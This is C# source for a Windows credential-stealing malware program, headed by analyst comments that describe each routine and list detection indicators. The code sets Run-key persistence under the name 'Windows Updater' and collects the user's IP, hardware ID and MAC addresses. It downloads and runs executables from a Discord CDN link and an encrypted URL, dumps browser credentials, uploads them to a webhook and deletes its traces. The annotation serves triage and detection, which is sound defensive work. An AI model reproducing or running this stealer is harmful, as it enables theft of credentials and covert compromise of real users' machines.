// ANALYST NOTES (defensive annotation; the code below is unchanged from the listing).
//
// Layout: the listing appears to have lost its original line breaks. As shown, the two
// "//" comments inside GetHWID and SendWebhook run to the end of their physical line.
//
// What the visible code does, per member:
//   Main           - Persistence. Opens SOFTWARE\Microsoft\Windows\CurrentVersion\Run under
//                    HKLM for writing and sets the value "Windows Updater" to the quoted
//                    path of the running assembly. The bare catch repeats the same write
//                    under HKCU whenever the HKLM attempt throws (for example when the
//                    process is not elevated). It then calls GetMACAddress.
//   GetMACAddress  - Writes the hex MAC of every network interface, space separated, to
//                    C:\Users\<user>\AppData\Local\Temp\macs.txt, then calls SendWebhook.
//                    The catch also calls SendWebhook, so collection continues on failure.
//   GetHWID        - Runs "cmd /c wmic csproduct get UUID" with no window and redirected
//                    stdout; returns the output with "UUID" removed, trimmed, upper-cased.
//   GrabIP         - Plain-HTTP GET to ipv4bot.whatismyipaddress.com to learn the public IP.
//   SendWebhook    - Posts user name, machine name, IP, HWID and the MAC list as form
//                    fields (username / avatar_url / content) to `url`, then uploads
//                    %TEMP%\browsercredentials.txt (the output of RetrivePass) to the same
//                    URL. Afterwards it downloads pass_decoder.exe from a
//                    cdn.discordapp.com attachment link into the user's Temp directory,
//                    starts it, waits 10 seconds and deletes it.
//   PasteStealer   - Not a stealer routine despite the name: Base64-decodes its argument
//                    and decrypts it with Rijndael (128-bit block, 256-bit key, CBC, PKCS7)
//                    using creds2 as key and creds1 as IV, returning a UTF-16 string.
//   RetrivePass    - Decrypts a hard-coded Base64 blob into a download URL, saves the file
//                    as %TEMP%\resourcefilehaha.exe, runs it hidden with
//                    "/C /stext %TEMP%\credentialslmao.txt", waits 500 ms, deletes the
//                    executable, reads and deletes the text file and returns its content.
//                    NOTE(review): the downloaded binary is not part of this listing; the
//                    "/stext <file>" switch suggests a tool that dumps its results to a
//                    text file - confirm against the actual sample.
//   dWebhook2      - Duplicate of the webhook members on Program. SendWebhook creates an
//                    instance (hook1) but no visible code uses it.
//
// Observations useful for triage:
//   - `url` is the placeholder "//webhook url" in this listing, so the exfiltration
//     endpoint is not recoverable from this page.
//   - The key and IV are hard-coded constants, so the encrypted download URL can be
//     recovered statically from a sample without executing it.
//   - Both secondary executables are fetched at run time; this file itself holds no
//     credential-parsing logic.
//
// Detection and hunting opportunities (all values taken from the code below):
//   Registry - a "Windows Updater" value under ...\CurrentVersion\Run (HKLM or HKCU)
//              pointing at an unexpected executable.
//   Process  - a windowless "cmd /c wmic csproduct get UUID" child of a user-land binary;
//              resourcefilehaha.exe or pass_decoder.exe started from the user's Temp folder.
//   File     - macs.txt, browsercredentials.txt, credentialslmao.txt in the user's Temp
//              folder. All are deleted after use, so file-creation telemetry is more
//              reliable than a later disk search.
//   Network  - HTTP request to ipv4bot.whatismyipaddress.com, a download from a
//              cdn.discordapp.com/attachments/ path, and form/file POSTs to a webhook URL
//              from a non-browser process.
//   Static   - the literal strings assigned to creds1 / creds2 and the Base64 blob in
//              RetrivePass are stable signature candidates for this build.
using Microsoft.Win32; using System; using System.Collections.Generic; using System.Collections.Specialized; using System.Diagnostics; using System.IO; using System.Linq; using System.Net; using System.Net.Http; using System.Net.NetworkInformation; using System.Runtime.CompilerServices; using System.Security.Cryptography; using System.Text; using System.Text.RegularExpressions; using System.Threading; using System.Windows.Forms; namespace StealerForAAPBypass { class Program { public static string creds1 = "aoI90PeaapejpsOP"; public static string creds2 = "Oi09ajhiplK0hip0goidp0jkduewsp0a"; static WebClient wc = new WebClient(); static string url = "//webhook url"; static string temp = "C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\"; private readonly WebClient dWebClient; private static NameValueCollection discordValues = new NameValueCollection(); public string WebHook { get; set; } public string UserName { get; set; } public string ProfilePicture { get; set; } public string embed { get; set; } public Program() { dWebClient = new WebClient(); } public void SendMessage(string msgSend) { discordValues.Add("username", UserName); discordValues.Add("avatar_url", ProfilePicture); discordValues.Add("content", msgSend); dWebClient.UploadValues(WebHook, discordValues); } public void Dispose() { dWebClient.Dispose(); } static void Main(string[] args) { try { using (RegistryKey key = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true)) { key.SetValue("Windows Updater", "\"" + System.Reflection.Assembly.GetExecutingAssembly().Location + "\""); } } catch { using (RegistryKey key = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true)) { key.SetValue("Windows Updater", "\"" + System.Reflection.Assembly.GetExecutingAssembly().Location + "\""); } } GetMACAddress(); } private static void GetMACAddress() { try { StreamWriter maczzz = new StreamWriter("C:\\Users\\" + Environment.UserName + 
"\\AppData\\Local\\Temp\\macs.txt"); foreach (NetworkInterface bok in NetworkInterface.GetAllNetworkInterfaces()) { string mac = string.Join("", bok.GetPhysicalAddress().GetAddressBytes().Select(b => b.ToString("X2"))); maczzz.Write(mac + " "); } maczzz.Close(); SendWebhook(); } catch { SendWebhook(); } } static string GetHWID() { // Grab Hardware ID | (HWID) string CMD = "wmic csproduct get UUID"; var procStartInfo = new ProcessStartInfo("cmd", "/c " + CMD) { CreateNoWindow = true, RedirectStandardOutput = true, UseShellExecute = false }; var proc = new Process() { StartInfo = procStartInfo }; proc.Start(); return proc.StandardOutput.ReadToEnd().Replace("UUID", string.Empty).Trim().ToUpper(); } static void SendWebhook() { string HWID = GetHWID(); string macLocation = ("C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\macs.txt"); string IP = GrabIP(); string str = Environment.ExpandEnvironmentVariables("%TEMP%"); Program hook = new Program(); dWebhook2 hook1 = new dWebhook2(); string macs = File.ReadAllText(macLocation); hook.WebHook = url; hook.SendMessage("```asciidoc\n" + "Account stolen from :: " + Environment.UserName + " / " + Environment.MachineName + "\nIP address :: " + IP + "\nHWID :: " + GetHWID() + "\nMac addresses :: \n" + macs + "```"); try { string contents = RetrivePass(); File.WriteAllText(str + "\\browsercredentials.txt", contents); wc.UploadFile(url, str + "\\browsercredentials.txt"); File.Delete(str + "\\browsercredentials.txt"); } catch { File.Delete(str + "\\browsercredentials.txt"); } File.Delete(macLocation); File.Delete("C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\macs.txt"); // file needed for password decoding wc.DownloadFile("https://cdn.discordapp.com/attachments/762526256264249367/771384271067807804/pass_decoder.exe", "C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\pass_decoder.exe"); Process.Start("C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\pass_decoder.exe"); 
Thread.Sleep(10000); File.Delete("C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\pass_decoder.exe"); } static string GrabIP() { string ip = wc.DownloadString("http://ipv4bot.whatismyipaddress.com/"); return ip; } public static string PasteStealer(string encrypted) { byte[] array = Convert.FromBase64String(encrypted); RijndaelManaged rijndaelManaged = new RijndaelManaged(); rijndaelManaged.BlockSize = 128; rijndaelManaged.KeySize = 256; rijndaelManaged.Key = Encoding.UTF8.GetBytes(creds2); rijndaelManaged.IV = Encoding.UTF8.GetBytes(creds1); rijndaelManaged.Padding = PaddingMode.PKCS7; rijndaelManaged.Mode = CipherMode.CBC; using (ICryptoTransform cryptoTransform = rijndaelManaged.CreateDecryptor(rijndaelManaged.Key, rijndaelManaged.IV)) { byte[] bytes = cryptoTransform.TransformFinalBlock(array, 0, array.Length); return Encoding.Unicode.GetString(bytes); } } private static string RetrivePass() { string text = Environment.ExpandEnvironmentVariables("%TEMP%"); WebClient webClient = new WebClient(); webClient.DownloadFile(PasteStealer("CW/PsKH5sxTA0WGmJaxxW1ML+wT8q90jrto/c7dDT2qpe/RLNvNoRsub28By1W82Y2d0V7rQGgEj9trh+a3AIbT/Z2/izeQvy1ntGG4lya3YSpfVpW8G+500Yecb6tYEBQuTV4kkvzbjp5q8276S65gwBQJ/dFTo2ruNnKyOV6PDfRtZ5UzH106UnQJbdjKMh/1ZVkmMjpDP8KWIUprbn7srzcR+qmWhfNc9ruueUTBIud63/BuLPxaT9QdzG1j6eP4Mc7Wj0sB784SXWjm6gQ=="), text + "\\resourcefilehaha.exe"); webClient.Dispose(); Process process = new Process(); ProcessStartInfo processStartInfo = new ProcessStartInfo(); processStartInfo.WindowStyle = ProcessWindowStyle.Hidden; processStartInfo.FileName = text + "\\resourcefilehaha.exe"; processStartInfo.Arguments = "/C /stext " + text + "\\credentialslmao.txt"; ProcessStartInfo processStartInfo3 = process.StartInfo = processStartInfo; process.Start(); Thread.Sleep(500); File.Delete(text + "\\resourcefilehaha.exe"); string result = File.ReadAllText(text + "\\credentialslmao.txt"); File.Delete(text + "\\credentialslmao.txt"); return result; } class dWebhook2 { 
private readonly WebClient dWebClient; private static NameValueCollection discordValues = new NameValueCollection(); public string WebHook { get; set; } public string UserName { get; set; } public string ProfilePicture { get; set; } public string embed { get; set; } public dWebhook2() { dWebClient = new WebClient(); } public void SendMessage(string msgSend) { discordValues.Add("username", UserName); discordValues.Add("avatar_url", ProfilePicture); discordValues.Add("content", msgSend); dWebClient.UploadValues(WebHook, discordValues); } public void Dispose() { dWebClient.Dispose(); } } } }